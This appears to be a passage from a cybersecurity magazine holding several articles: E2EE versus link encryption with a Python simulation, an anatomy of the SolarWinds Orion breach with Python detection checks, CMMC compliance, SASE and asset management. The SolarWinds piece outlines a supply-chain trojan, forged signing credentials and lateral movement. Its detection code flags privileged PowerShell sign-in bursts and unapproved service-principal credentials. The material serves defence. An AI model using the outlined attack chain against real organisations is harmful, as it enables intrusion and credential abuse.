In addition, it is significant to take into consideration the meaning of ASCII characters, which can give an opportunity to work out how the open message could look. For instance, any sentence within the plaintext ends with some punctuation sign, so there can be entire variations of the possible decrypted information. In other words, while E2EE is critical at its endpoints, it can be quite concerning on its way from source to destination, as the channel can be tapped and potentially broken into. To illustrate link encryption, we can use the example of a highway with all the infrastructure that serves to direct traffic. The driver on that road must know where he is going, and he is permitted to rely on the traffic signs. In other words, the use of maps and GPS navigation is allowed, but what good are they if the driver does not know the pathway? Link encryption is more like sending the packet of information through a well-protected channel in which the routing information bits are carefully encrypted. The only information available at any given moment is the next stop. So, if some GPS navigation is to be applied, it must proceed step by step. In other words, the next-stop linkage information is included in plaintext for reading, so it is possible to work out where the next station for such a packet is. In general terms, those stops can be considered hops, where the entire packet is decrypted and re-encrypted in order to obtain the information about where the packet should be delivered next. Best practice suggests that the most useful solution is the combination of E2EE and link encryption, because then both the payload and the routing information are well protected. That sort of cryptography is known as super-encryption. A hop is any device in the network through which directed traffic can pass, and it can be a router, modem or server. The hop is also a sensitive point in the network, because hackers can identify that part of the IT infrastructure and try to attack the place where decryption of the packet takes place.
That is an especially large risk in the case of network monitoring, because the bad guys can find and exploit the places where the plaintext is widely accessible. In other words, today’s cyber criminals are extremely skillful individuals with exceptional technical brilliance who are capable of discovering any weakness in a system and taking advantage of it. The mix of E2EE and link encryption gives a safer environment for data transport, but it is still vulnerable to high-tech attacks and campaigns.
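The contrast drawn above between E2EE, link encryption and their combination can be made concrete. The Python model below is an added example, not the author’s code; the four-device path, the per-link and end-to-end keys and the toy XOR stream cipher are all constructed for illustration, and it reports, for every link, what a tap on the wire and the receiving hop can read under each scheme.

```python
import hashlib
import json
import os

# Constructed example: a four-device path. Alice and Bob are the endpoints,
# R1 and R2 are intermediate hops (routers) that hold only link keys.
PATH = ["alice", "R1", "R2", "bob"]
LINK_KEYS = {                       # constructed per-link keys
    ("alice", "R1"): b"link-key-alice-r1",
    ("R1", "R2"): b"link-key-r1-r2",
    ("R2", "bob"): b"link-key-r2-bob",
}
E2E_KEY = b"end-to-end-key-alice-bob"   # constructed key shared only by Alice and Bob


def toy_stream_cipher(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Constructed toy XOR stream cipher with a SHA-256 counter keystream.
    It stands in for a real AEAD (e.g. AES-GCM) so the example runs offline;
    it is not authenticated and is for illustration only.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    keystream = bytearray()
    counter = 0
    while len(keystream) < len(data):
        keystream += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, keystream))


def build_frame(header: dict, payload: bytes) -> bytes:
    """A packet: routing information (length-prefixed JSON) then the payload bits."""
    raw = json.dumps(header, sort_keys=True).encode()
    return len(raw).to_bytes(2, "big") + raw + payload


def parse_frame(frame: bytes):
    n = int.from_bytes(frame[:2], "big")
    return json.loads(frame[2:2 + n]), frame[2 + n:]


def simulate(mode: str, message: bytes) -> dict:
    """Carry `message` from Alice to Bob along PATH and record, for every link,
    what a tap on the wire and the receiving hop can read.
    mode is "e2ee" (payload only), "link" (hop by hop) or "super" (both,
    the combination the article calls super-encryption)."""
    use_e2ee = mode in ("e2ee", "super")
    use_link = mode in ("link", "super")

    # E2EE: Alice ciphers the message once; only Bob holds E2E_KEY.
    e2e_nonce = os.urandom(8)
    payload = toy_stream_cipher(E2E_KEY, e2e_nonce, message) if use_e2ee else message

    report = {}
    for i in range(len(PATH) - 1):
        src, nxt = PATH[i], PATH[i + 1]
        header = {"dst": PATH[-1], "next": nxt}
        header_raw = json.dumps(header, sort_keys=True).encode()
        frame = build_frame(header, payload)

        # Link encryption covers header *and* payload, but only for this one link.
        link_nonce = os.urandom(8)
        link_key = LINK_KEYS[(src, nxt)]
        wire = toy_stream_cipher(link_key, link_nonce, frame) if use_link else frame

        # A passive tap between src and nxt sees only `wire`.
        observed = {
            "wire_shows_routing": header_raw in wire,
            "wire_shows_message": message in wire,
        }

        # The hop `nxt` holds the link key, so it strips the link layer and reads
        # the routing information to decide where the packet goes next. Whether
        # it can also read the message depends on whether E2EE is in place.
        received = toy_stream_cipher(link_key, link_nonce, wire) if use_link else wire
        hdr, payload = parse_frame(received)
        assert hdr["next"] == nxt
        observed["hop_sees_message"] = message in payload
        report[f"{src}->{nxt}"] = observed

    # Bob, the final destination, removes the end-to-end layer last.
    recovered = toy_stream_cipher(E2E_KEY, e2e_nonce, payload) if use_e2ee else payload
    report["delivered"] = recovered == message
    return report


if __name__ == "__main__":
    msg = b"constructed sample message: meet at 0900."
    for mode in ("e2ee", "link", "super"):
        print(mode, simulate(mode, msg))
```

With "e2ee" the routing header is readable on the wire but the message is not; with "link" the wire shows nothing but every hop sees the message in clear; with "super" neither the wire nor the intermediate hops see either, which is the point of combining the two.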

About the Author Milica D. Djekic is an Independent Researcher from Subotica, the Republic of Serbia. She received her engineering background from the Faculty of Mechanical Engineering, University of Belgrade. She writes for some domestic and overseas presses and she is also the author of the book “The Internet of Things: Concept, Applications and Security”, published in 2017 with Lambert Academic Publishing. Milica is also a speaker with the BrightTALK expert’s channel. She has been a member of ASIS International since 2017 and a contributor to the Australian Cyber Security Magazine since 2018. Milica's research efforts are recognized by the Computer Emergency Response Team for the European Union (CERT-EU), Censys Press, BU-CERT UK and the EASA European Centre for Cybersecurity in Aviation (ECCSA). Her fields of interest are cyber defense, technology and business. Milica is a person with disability.


Anatomy of a hack – Solar Winds Orion
Nation State hacks major IS software vendor
By James Gorman, CISO, Authx

What happened when one of the leading IT support vendors in the world was compromised, along with leading government agencies the world over and up to 18,000-33,000 [1] companies running the affected versions (2019.4 HF 5 and 2020.2 with no hotfix, or 2020.2 HF 1) [2] of SolarWinds Orion software?

What happened:

1) The threat actor – indicated to be a nation state in Microsoft’s Threat Intelligence Center’s release [3] – was able to compromise the update process for SolarWinds and embed a trojan horse that allowed the attacker to gain administrative access to the network.

2) Using the acquired administrative access, the intruder moved laterally to gain access to the organization’s certificate signing credentials. This allows the attacker to generate “real-looking” credentials and continue to move throughout the organization.

3) Using the now trusted yet hacked credentials, the attacker then takes stock of what else they have access to in the organization, on-premises and cloud based. Because they hold seemingly valid credentials, they do not trigger most alerts that look for unusual login failures.

4) Once the attacker has access to a Global Administrator’s account or its trusted certificate, they use that to impersonate the admin; they essentially have the keys to the kingdom and can create new global admins, add them to existing services and/or create new services, and then go after API access to the organization.

[1] https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000162828020017451/swi-20201214.htm
[2] https://www.solarwinds.com/securityadvisory
[3] https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/

What has been reported is that once this particular hacker gets access to the global administrator, they keep the malicious programs – malware – to a minimum and use remote access to move through the enterprise and take over code repositories, trade secrets, Microsoft Office 365, Azure Active Directory, essentially every system that relies on federated access and authentication. The list of who was hacked keeps growing, and it is a veritable who’s who of what a Nation State actor would want – US State Department, Pentagon, Department of Homeland Security, National Institutes of Health and others, as well as many private firms [4]. While many of the known targets are the “big guys”, if you use SolarWinds Orion assume you are compromised.

If you use SolarWinds Orion, assume you are compromised: take it offline, upgrade and contact SolarWinds. https://www.solarwinds.com/securityadvisory

If you are a CISO or security professional, you should know that in this hack you could do everything right and still have been vulnerable. You could have anti-malware tools running, login restrictions on sensitive systems, monitoring of the failures, all the things you would do in a traditional defense-in-depth environment. That is because you trusted your supply chain: one of the largest and most trusted names in network monitoring and management was breached, and you are now vulnerable and probably compromised.

You could have done everything right and still been compromised! This is the lesson to learn here: all you can do is mitigate and minimize the damage done. Some hackers are very, very good, and your security is only as good as the weakest link in your supply chain. It could be one of your largest and most trusted IT suppliers that is the avenue of attack. You have to trust and verify everyone.

So what is a person to do if they are or are not compromised? There are some things that, had they been in place, could have mitigated or limited the damage due to the internal spread of this particular hack. We still do not know how the development/release system at SolarWinds was compromised – I for one am looking forward to seeing how that happened.

What to do now that we know what we know –

1) Update your software frequently – this is still the best way to keep known vulnerabilities at bay. Don’t let this supply chain hack scare you into not keeping your systems up to date. It is one of the most basic principles in cybersecurity: patch your systems.
2) Use updated antivirus systems that are quickly updated to mitigate this attack.
3) Monitor your network and systems for anomalous behavior – look for multiple PowerShell accesses to Active Directory from the same machine, especially privileged sign-ins [5].
4) Look for additions to your federated services, and use best practices for securing your AD FS services [6].
5) Use whitelists for access to your sensitive network segments – block outbound traffic except what is needed for vital business processes on your trusted segments. This blocks the trojan’s access to its home Command and Control (C2) servers, through which the hackers then get access to your environment.
6) Use hardware-based tokens (HSMs) for SAML signatures.
7) Alert on new access credentials on OAuth applications and verify that they are authorized.
8) Reduce attack surface by removing applications and service principals that are not needed on your systems. Make sure you are logging service principal access and look for anomalies.
9) Use multifactor authentication with biometric factors for all logins.

[4] https://news.yahoo.com/solarwinds-orion-more-us-government-131005599.html
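Recommendations 3, 7 and 8 above can be turned into simple detection logic. The Python below is an added example, not Authx’s or SolarWinds’ code; the sign-in and audit records, their CSV layout and the change-control references are constructed, and checking credential additions against an approved-change list is an assumption about how a team would verify them as authorized.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in records in a generic CSV shape (not any vendor's schema):
# timestamp,host,account,client,target,privileged,result
SAMPLE_SIGNINS = """\
2020-12-14T09:01:12Z,WS-1042,jdoe,Outlook,Exchange Online,no,success
2020-12-14T09:03:40Z,ORION-SRV01,svc_orion,PowerShell,Active Directory,no,success
2020-12-14T09:04:05Z,ORION-SRV01,adm_backup,PowerShell,Active Directory,yes,success
2020-12-14T09:06:51Z,ORION-SRV01,adm_exchange,PowerShell,Active Directory,yes,success
2020-12-14T09:07:30Z,ORION-SRV01,ga_cloudadmin,PowerShell,Azure AD,yes,success
2020-12-14T09:15:00Z,WS-2210,asmith,Browser,SharePoint,no,success
2020-12-14T10:42:19Z,DC01,adm_backup,PowerShell,Active Directory,yes,success
"""

# Constructed directory audit records: timestamp,actor,activity,target,change_ref
# (an empty change_ref means no change ticket was recorded for the action).
SAMPLE_AUDIT = """\
2020-12-14T09:20:03Z,ga_cloudadmin,Add service principal credentials,sp:mail-archiver,
2020-12-14T11:05:44Z,ga_cloudadmin,Update application,app:hr-portal,CHG-2020-1187
2020-12-14T12:30:00Z,it_ops,Add service principal credentials,sp:hr-portal,CHG-2020-1187
"""

# Hypothetical change-control references that were reviewed and approved.
APPROVED_CHANGES = {"CHG-2020-1187"}


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_signins(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        ts, host, account, client, target, privileged, result = line.split(",")
        events.append({"ts": _ts(ts), "host": host, "account": account,
                       "client": client, "target": target,
                       "privileged": privileged == "yes", "result": result})
    return events


def parse_audit(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        ts, actor, activity, target, change_ref = line.split(",")
        events.append({"ts": _ts(ts), "actor": actor, "activity": activity,
                       "target": target, "change_ref": change_ref})
    return events


def privileged_fanout(events, window=timedelta(minutes=15),
                      min_accounts=2, client="PowerShell") -> dict:
    """Recommendation 3: hosts from which `min_accounts` or more distinct
    privileged accounts signed in successfully via `client` within `window`.
    Returns {host: sorted list of accounts}."""
    by_host = defaultdict(list)
    for e in events:
        if e["privileged"] and e["client"] == client and e["result"] == "success":
            by_host[e["host"]].append(e)
    alerts = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        best = set()
        for i, first in enumerate(evs):          # sliding window from each event
            accounts = {e["account"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            alerts[host] = sorted(best)
    return alerts


def unapproved_credential_adds(audit_events, approved=APPROVED_CHANGES) -> list:
    """Recommendations 7 and 8: credential additions on service principals /
    OAuth applications that carry no approved change reference. Returns targets."""
    return [e["target"] for e in audit_events
            if e["activity"] == "Add service principal credentials"
            and e["change_ref"] not in approved]


if __name__ == "__main__":
    print(privileged_fanout(parse_signins(SAMPLE_SIGNINS)))
    print(unapproved_credential_adds(parse_audit(SAMPLE_AUDIT)))
```

On the constructed data the first check flags ORION-SRV01, where three distinct privileged accounts used PowerShell within a few minutes, and leaves the single privileged sign-in on DC01 alone; the second flags the credential added to sp:mail-archiver without a change ticket.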

Authx https://authx.com is a prime example of how to verify who actually has access to your systems. It is a multifactor authentication mechanism that uses biometrics – face, finger, palm or one-time pad to give additional validity to the user access experience. Authx or another would have limited the ability for lateral movement and the persistence of this or most imposter credential attacks.

About the Author James Gorman CISO, Authx James is a solutions-driven, results-focused technologist and entrepreneur with experience securing, designing, building, deploying and maintaining large-scale, mission-critical applications and networks. Over the last 15 years he has led teams through multiple NIST, ISO, PCI, and HITRUST compliance audits. As a consultant, he has helped multiple companies formulate their strategy for compliance and infrastructure scalability. His previous leadership roles include CISO, VP of Network Operations & Engineering, CTO, VP of Operations, Founder & Principal Consultant, Vice President and CEO at companies such as GE, Epoch Internet, NETtel, Cable and Wireless, SecureNet, and Transaction Network Services. James can be reached online at ([email protected], https://www.linkedin.com/in/jamesgorman/, etc.) and at our company website https://authx.com

[5] https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-all-sign-ins
[6] https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/best-practices-securing-ad-fs


Cybersecurity Maturity Model Certification (CMMC)
It is not about compliance, or is it?
By Carter Schoenberg, CISSP & CMMC Registered Practitioner, Vice President – Cybersecurity, SoundWay Consulting, Inc.

As of the date of this publication, new requirements for U.S. Defense Contractors are in play. The days of addressing cybersecurity requirements with “it doesn’t apply to me” are officially over. In case you missed it, there are four letters that should have you standing up and taking notice (CMMC). To start with, what exactly is CMMC? The Cybersecurity Maturity Model Certification (aka CMMC) is a new and comprehensive framework that will dictate future awards made by the U.S. Department of Defense. This framework is managed by a non-government entity known as the CMMC Accreditation Body (AB) and fully supported by the highest levels of U.S. Department of Defense (DOD) Leadership.

Starting back in 2017, requirements to meet 110 security controls described in the National Institute of Standards and Technology Special Publication 800-171 “Protecting Controlled Unclassified Information in Non-Federal Systems and Organizations” were included in formal solicitations under the Defense Federal Acquisition Regulation (DFAR). Unfortunately, procurement officials generally highlighted this requirement with a single sentence in solicitations and relied upon self-attestation. Since that time, the F35 Strike Fighter technical designs, Naval defensive electronics on sea vessels, and arguably the largest release of malware created for offensive operations by the National Security Agency have all been compromised due to poor cyber hygiene by U.S. Government Contractors (GovCons).

Whether we like it or not, the U.S. Government is justified in taking the position “enough is enough” and now forcing all, let me say that again, ALL GovCons seeking work with the DOD to demonstrate adequate cyber hygiene. These efforts are spearheaded by Ms. Katie Arrington. As described by Ms. Arrington, the Government is taking a crawl, walk, run approach towards formal implementation of CMMC. CMMC has five levels of maturity, starting with Maturity Level 1, which equates to being able to demonstrate that 17 practices (security safeguards) are implemented. Starting around June 2021, it is estimated 15 contracts will be issued impacting 1500 GovCons, and this will ramp up to all engagements no later than FY2026. This is all contingent upon formal adoption within the DFAR.

To make matters even more interesting, the interim DFAR ruling explicitly states that as of December 1, 2020, a large number of GovCons have to immediately report to the Government their current status towards conforming with NIST SP 800-171. If the level of accuracy of self-attestations seen previously is any indicator, there is a likelihood that GovCons may be inclined to fudge the results, because who at the Defense Department is really going to police the results, right? WRONG! Misrepresenting the results has two significant consequences. One adverse consequence is well defined by industry stakeholders and one is being overlooked. The first is under what is known as the False Claims Act. This is actually a criminal investigation under the direction of the Justice Department and targets individuals (CEOs, Boards of Directors). The second is under the Federal Trade Commission (FTC) as a Title 15 violation for an unfair and deceptive business practice, and it can result in heavy financial sanctions.

The Government is socializing the message that its goal is not to create a compliance mandate but rather to foster the adoption of actual cybersecurity best practices in a way that enhances the GovCon. Whether you are Maturity Level 1 or even Level 5, two forms of objective evidence will be required as proof of adoption of the practices and processes defined within CMMC. That sounds a lot like a compliance initiative. Instead of the term “audit”, the CMMC nomenclature uses the term “assessment”.

If you have been through a FISMA, CMMI, ISO, PCI or other audit where objective evidence is required for proof of meeting the standard, this exercise is academically no different. There is one caveat to that. Once Maturity Level 3 is applicable (the GovCon receives or creates CUI), then simply having safeguarding controls and appropriate policies & procedures is not enough. It is incumbent on the GovCon to demonstrate they are all “managed”. What does that mean though? Think of it as “operationalizing” these best practices into your core business daily operations. From here, you advance to Maturity Level 4, requiring everything from Levels 1-3 plus being able to demonstrate everything is “Reviewed” at least annually. Then at Maturity Level 5, you must be able to demonstrate your organization is optimizing the aforementioned practices and processes.

If you are already ISO 27001 certified, congratulations – it is no longer enough. If you are CMMI Level 3 Certified, congratulations – it too is no longer enough. What about FedRAMP? That too is no longer enough.

To date, the DOD is stating that having your formal certification is not required to bid, just required at time of award. The Government and the CMMC-AB estimate you should allow yourself a 6-month window to prepare for Maturity Level 3 and higher. Having performed almost 40 of these types of assessments for Government and Industry, the author’s advice is that GovCons would be wise to project an 8 to 10-month runway. These presumptions are also problematic because the average award timeline is approximately 120 calendar days. Even if the 6-month preparation estimate is correct, that still leaves a delta of two months. This essentially means that a failure to have certification prior to submitting your proposal for Maturity Level 3 and higher will likely result in somebody else receiving the award.

For GovCons that are micro-size entities with home-based offices, you should consider the strong likelihood that your home will actually be inspected even at Maturity Level 1. For more details on what assessors will look for, please click here.

It is important to note that if you are a GovCon you should:
• Take immediate steps towards CMMC preparation at Maturity Level 1 with an understanding you may likely be required to have a Level 3 rating within a year or so.
• Carefully review the specifications of the requirements in CMMC.
• Do not take the position of believing you are in good shape because your IT guy told you so.
• Do not take the position this framework will go away with the new administration.
• Do seek out Registered Provider Organizations that have licensed Registered Practitioners authorized by the CMMC Accreditation Body.
• Understand this framework is a work in progress and will continue to evolve as the cyber threat landscape evolves.

One last noteworthy point is that there are a number of industry stakeholders continuously trying to find fault with the CMMC-AB and Ms. Arrington. Taking this approach is like waving at the train when it has already left the station. ALL ABOARD!


About the Author Carter Schoenberg is the Vice President of Cybersecurity at SoundWay Consulting. Carter has over 20 years’ experience supporting Government and Industry stakeholders and is a subject matter expert on the Cybersecurity Maturity Model Certification (CMMC), cyber investment strategies, and reducing organizational exposure to harm from cyber liabilities. His work products have been used by DHS, DOD, NIST, and the ISAC communities. Carter can be reached online at [email protected] and through www.soundwayconsulting.com or the CMMC Marketplace


Businesses Should See Security as An Enabler of Digital Transformation, Not A Hindrance
A distributed workforce has renewed the importance of security for all aspects of organizations’ technology estates

By Matt Gyde, CEO, Security Division at NTT Ltd.

The pandemic has put a spotlight on cybersecurity issues as businesses have moved to a distributed workforce model. Many businesses found it difficult to move with agility to provide employees with the devices and network infrastructure needed to operate and communicate seamlessly when COVID-19 first hit.

In fact, according to NTT’s 2020 Intelligent Workplace Report ‘Shaping Employee Experiences for a World Transformed’, in many cases, employees have been left to use their personal devices and applications, increasing the risk of security vulnerabilities. Additionally, only 46.4% of global businesses surveyed for the same report claimed they increased their IT security capabilities to keep their organization and employees secure.

The rise in nefarious threats during the pandemic is clearly outlined in NTT's Global Threat Intelligence report, as hackers seek to exploit the coronavirus-related panic. Attacks have included information-stealing malware built into a fake World Health Organization (WHO) information app, while phishing emails have offered in-demand items including face masks, hand sanitizer and coronavirus tests. These were so bad that the WHO called it an "infodemic."


Secure by design approach crucial for businesses to protect themselves

Unfortunately, just like the COVID-19 virus itself, cybercriminals and spies aren’t becoming fatigued by its impact on our personal and professional freedoms and prospects, as many of us are. Threat actors and organizations are opportunistic and both well-organized and funded enough to ramp up their nefarious activities despite the current worldwide crisis.

This has, in turn, spawned renewed acknowledgment of the importance of security being embedded in all aspects of organizations' technology estates. Whether applications and workloads are running on-premises or in a public or private cloud, and irrespective of whether people are working from home, the office, or remotely, infrastructure needs to be inherently secure by design and entrenched in every aspect of a business's environment. Security cannot be 'bolted on' as an afterthought, because it impacts both the customer and the employee experience.

Perhaps many organizations have not embedded security in their organization because they see security as a hindrance and not a driver of digital enablement. A cultural mind-set shift needs to happen. Security helps businesses to deliver transformational technology that enables the best user experience. And it is intrinsically linked to the protection of employee data.

Digital transformation with SASE

At NTT, we predict in our ‘Future Disrupted: 2021’ report that the concept of ‘secure access service edge’ (SASE), a term coined by Gartner, is going to be a mainstream trend in the next 12 months. SASE focuses on achieving the best end-user experience in an increasingly SaaS and software-defined network paradigm, securing APIs and capitalizing on ‘as-a-service’ scenarios such as firewall-as-a-service or CASB-as-a-service.

In order to start with SASE, businesses will need to truly assess what, and which, assets they need to protect, where distributed workloads are running, and how their business consumes applications, and ensure infrastructure is fit for purpose:
• Assess what, and which, assets businesses need to protect: To start, businesses should look at data protection. They'll need to pinpoint exactly what they absolutely have to protect and decide what is 'crown jewels' data and information versus what's not. Then they can return to the basics: good operations hygiene and due diligence.
• Understand where various workloads are running: This will mean businesses should look at implementing appropriate firewalls and micro-segmentation.
• Consider applications and how they're being consumed: Importantly, businesses should ask themselves how these consumption trends tie back to the platform strategy and the related end-user/customer and end-point protocols, and how those are interacting with various workloads and applications.
• 'Dust off' existing network and application security strategies: Businesses should ensure that their security strategies are still fit for purpose. This will likely include making decisions about their path to SD-WAN adoption.

Ultimately, businesses must ensure that cybersecurity protects internal operations and employee data, as well as its customers. Today, this means that simply buying ‘point’ security is no longer a viable approach – it needs to be baked into system design.


Businesses must increasingly focus on ensuring that cybersecurity is an enabler, not a hindrance, to digital transformation and use the right frameworks and partnerships within the ecosystem to do so. There is no more important time than now for the industry to come together to mount a powerful defence against an ever-mounting and ever-evolving cyber threat.

About the Author Matt Gyde is the President and Chief Executive Officer, Security Division at NTT Ltd. He is leading the security strategy, services and go-to-market execution to build the world’s most recognized security business. Matt can be reached via his LinkedIn profile at: https://www.linkedin.com/in/matt-gyde/ and at https://hello.global.ntt.


Asset Management, The Weakest Link in Cybersecurity Risk By Gyan Prakash, Head of Cyber Security / Security Engineering, Altimetrik Corp

Summary
This paper shares the limitations of existing asset management solutions for cybersecurity needs and how to enhance the capability of existing asset management solutions so that they meet enterprise cybersecurity risk needs, uncovering high-risk and vulnerable assets to CISOs and senior management with data-driven automation on a near-real-time basis.

It highlights the gaps in current asset management solutions, the critical role an asset management solution plays in securing the enterprise from advanced threats and in cybersecurity risk management, and the importance of asset management in identifying the asset criticality rating (static risk), inherent risk and residual risk.


Cybersecurity risk not only helps uncover the critical, risky assets but also helps drive enterprise priorities and future enhancements and investment in security technologies.

Introduction
IT asset management solutions help discover and provide visibility into every IP connected device in the enterprise environment. Accurate asset discovery and visibility is one of the critical prerequisites to securing an asset: what you see is what you protect. Leading research shows that on average companies are blind to 40% of the devices in their environment. As a result, businesses do not have a real-time, comprehensive view of all the assets in their environment, or know the risks associated with them.

Assets can be broadly divided into the following categories:
- Endpoint user devices (managed assets and unmanaged assets)
- Production and non-production network infrastructure devices
- Enterprise IoT devices (cameras, printers, smart TVs, HVAC systems, industrial robots, medical devices, physical security access, etc.)

ISO 27001, the Information Security Management System (ISMS) certification, requires an enterprise to identify the information assets in scope for the management system and define appropriate protection responsibilities. NIST and the CIS Critical Security Controls also include asset inventory management as part of critical infrastructure security.

IT asset inventory management is a basic need of any enterprise, and for that purpose the urgency of discovery and visibility is not critical, whereas enterprise security relies primarily on accurate and detailed asset visibility on a near-real-time basis.


The majority of enterprise assets are distributed across many different geos and networks, such as private networks and public cloud. With remote work now widely accepted, near-real-time asset visibility and management becomes even more critical.

Traditional Asset Management
There are usually two kinds of asset management solutions on the market, agent based and network scan based, and both play a critical role in providing asset visibility.

Network scan based asset discovery: network scan based solutions help identify and discover devices on the network. The limitation is that the scanner must be able to reach every network, VLAN and subnet in the entire enterprise, and network based scans are limited to the details that can be observed over the network.

Agent based asset discovery: an agent based solution provides information about the OS and core OS services, versions, middleware services, patches, etc.

Traditional asset management solutions, also referred to as a CMDB (Configuration Management Database), are built to meet IT inventory and asset management needs such as asset ownership, cost center and support for patch management. These solutions were not designed with cybersecurity threats and cybersecurity risk management in focus.

Cybersecurity Dependency on Asset Management
Before we get into the details of the cybersecurity dependency, it is important to understand the definition of an asset. Generally, an asset is defined as an IP connected device. This usually works fine but is challenging for serverless assets, which have no fixed device to point at. An application consists of a group of assets.

The exponential increase in the number of assets, be it mobile devices, lightweight microservice based servers, self-mutating servers or serverless assets, has made near-real-time asset management even more critical. The assets are distributed over many networks and geos, both private and public. The next generation of asset management will support the following capabilities:

- Provide asset context with regard to network placement and external visibility
- Bind assets to the applications or microservices running on them
- Provide an asset criticality risk rating
- Report the status of security agents on the assets
- Report the status of SIEM integration for OS level and application level logs
- Correlate each asset with all known security vulnerabilities, whether related to the OS, an application, identity and access management or the firewall
- Map sensitive data assets (such as PII, payment card data or PHI) to each of the servers
- Continuously track assets against enterprise security compliance
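The capabilities above come down to joining two inventories that see different things (the network scanner sees reachability, the agent sees installed software) and then correlating the result with a vulnerability feed. The following is an added example, not the author's tooling or any product's API: it merges a constructed network-scan result with constructed agent reports, attaches feed matches for each installed package, and reports the three gaps the list calls out (devices on the wire with no agent, hosts the scanner never reached, and managed hosts whose logs do not reach the SIEM). All hosts, versions, scores and finding identifiers are made up for illustration.

```python
"""Reconcile a network-scan inventory with agent reports and correlate each
asset with known vulnerabilities, flagging the visibility gaps the article
lists (unmanaged devices, scanner blind spots, missing SIEM forwarding).

Added example, not the author's tooling. Every host, version, CVSS score and
finding identifier below is constructed for illustration."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed network-scan output: only what is observable on the wire.
NETWORK_SCAN = [
    {"ip": "10.0.1.10", "hostname": "web-01", "open_ports": [22, 443]},
    {"ip": "10.0.1.11", "hostname": "web-02", "open_ports": [22, 443]},
    {"ip": "10.0.2.50", "hostname": "cam-lobby", "open_ports": [80, 554]},
]

# Constructed agent reports: OS and package detail only an agent can see.
AGENT_REPORTS = [
    {"ip": "10.0.1.10", "os": "ubuntu 20.04",
     "packages": {"openssl": "1.1.1f", "nginx": "1.18.0"}, "siem_forwarding": True},
    {"ip": "10.0.3.7", "os": "windows server 2019",
     "packages": {"iis": "10.0"}, "siem_forwarding": False},
]

# Constructed vulnerability feed: (package, version) -> [(finding id, CVSS base score)].
VULN_FEED = {
    ("openssl", "1.1.1f"): [("EXAMPLE-2020-0001", 7.5), ("EXAMPLE-2020-0002", 5.3)],
    ("iis", "10.0"): [("EXAMPLE-2021-0003", 9.8)],
}


@dataclass
class Asset:
    ip: str
    hostname: Optional[str] = None
    os: Optional[str] = None
    open_ports: List[int] = field(default_factory=list)
    packages: Dict[str, str] = field(default_factory=dict)
    seen_by_scan: bool = False      # reachable by the network scanner
    agent_present: bool = False     # reported by an endpoint agent, i.e. managed
    siem_forwarding: bool = False   # OS/application logs reach the SIEM
    vulns: List[Tuple[str, float]] = field(default_factory=list)

    @property
    def max_cvss(self) -> float:
        """Highest CVSS base score among the asset's known vulnerabilities."""
        return max((score for _, score in self.vulns), default=0.0)


def reconcile(scan, reports, feed) -> Dict[str, Asset]:
    """Merge both inventories by IP and attach feed matches for installed packages."""
    assets: Dict[str, Asset] = {}
    for row in scan:
        a = assets.setdefault(row["ip"], Asset(ip=row["ip"]))
        a.hostname, a.open_ports, a.seen_by_scan = row["hostname"], row["open_ports"], True
    for rep in reports:
        a = assets.setdefault(rep["ip"], Asset(ip=rep["ip"]))
        a.os, a.packages, a.agent_present = rep["os"], rep["packages"], True
        a.siem_forwarding = rep["siem_forwarding"]
        for pkg, ver in rep["packages"].items():
            a.vulns.extend(feed.get((pkg, ver), []))
    return assets


def gaps(assets: Dict[str, Asset]) -> Dict[str, List[str]]:
    """The three visibility gaps, each as a sorted list of IPs."""
    return {
        # On the network but no agent: the unmanaged assets the article warns about.
        "unmanaged": sorted(ip for ip, a in assets.items() if a.seen_by_scan and not a.agent_present),
        # Agent reports it but the scanner never saw it: a subnet the scanner cannot reach.
        "scan_blind": sorted(ip for ip, a in assets.items() if a.agent_present and not a.seen_by_scan),
        # Managed, but its logs never reach the SIEM.
        "no_siem": sorted(ip for ip, a in assets.items() if a.agent_present and not a.siem_forwarding),
    }


if __name__ == "__main__":
    inventory = reconcile(NETWORK_SCAN, AGENT_REPORTS, VULN_FEED)
    for ip, a in sorted(inventory.items()):
        print(f"{ip:<10} {a.hostname or '-':<10} agent={a.agent_present!s:<5} "
              f"siem={a.siem_forwarding!s:<5} max_cvss={a.max_cvss}")
    print(gaps(inventory))
```

Note that the camera (10.0.2.50) and the second web server carry no vulnerability data at all, not because they are clean but because nothing can report their software; that is the blind spot the article's 40% figure describes, and it is why an unmanaged asset should be treated as unknown risk rather than zero risk.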

Since 2019, OWASP has also listed Improper Assets Management as one of the top ten API security vulnerabilities across the industry.

Automate Asset Criticality Risk Rating
Asset criticality is the most important factor in understanding the risk of an asset being compromised. The asset criticality rating gives a view of the asset's risk before any known security vulnerability is taken into account. Any asset in a production or non-production environment introduces risk, and that risk is related to the type of data the asset processes or handles, the asset's exposure to the outside world, and how the unavailability of the asset would affect the business and enterprise services. We can also call this static risk, meaning the minimum risk that this asset introduces to the enterprise.

None of the traditional asset management solutions offers an asset criticality risk rating, so many enterprises generate this rating using non-standard and ad hoc techniques.

Asset Criticality Risk Rating
What would the impact on the enterprise be if an asset were unavailable, tampered with or breached?

Critical assets are those that are essential for supporting critical enterprise business needs. These assets have a high consequence of failure, so failures of such assets must be avoided. They should be identified urgently and given more attention than other assets.


Every organization has a way to identify which applications are critical, which is fairly easy; the challenge is mapping each and every asset to those critical applications and doing it consistently and in real time.

Building an Asset Criticality Rating
The Asset Criticality Risk Rating (ACRR) is the foundation for determining asset risk. Some important aspects of building the ACRR are:
- It must be fully automated and not dependent on user input
- It must provide a consistent ACRR in near real time
- It must give the risk analyst the option to adjust the weightings used in the ACRR

ACRR Calculation Approach
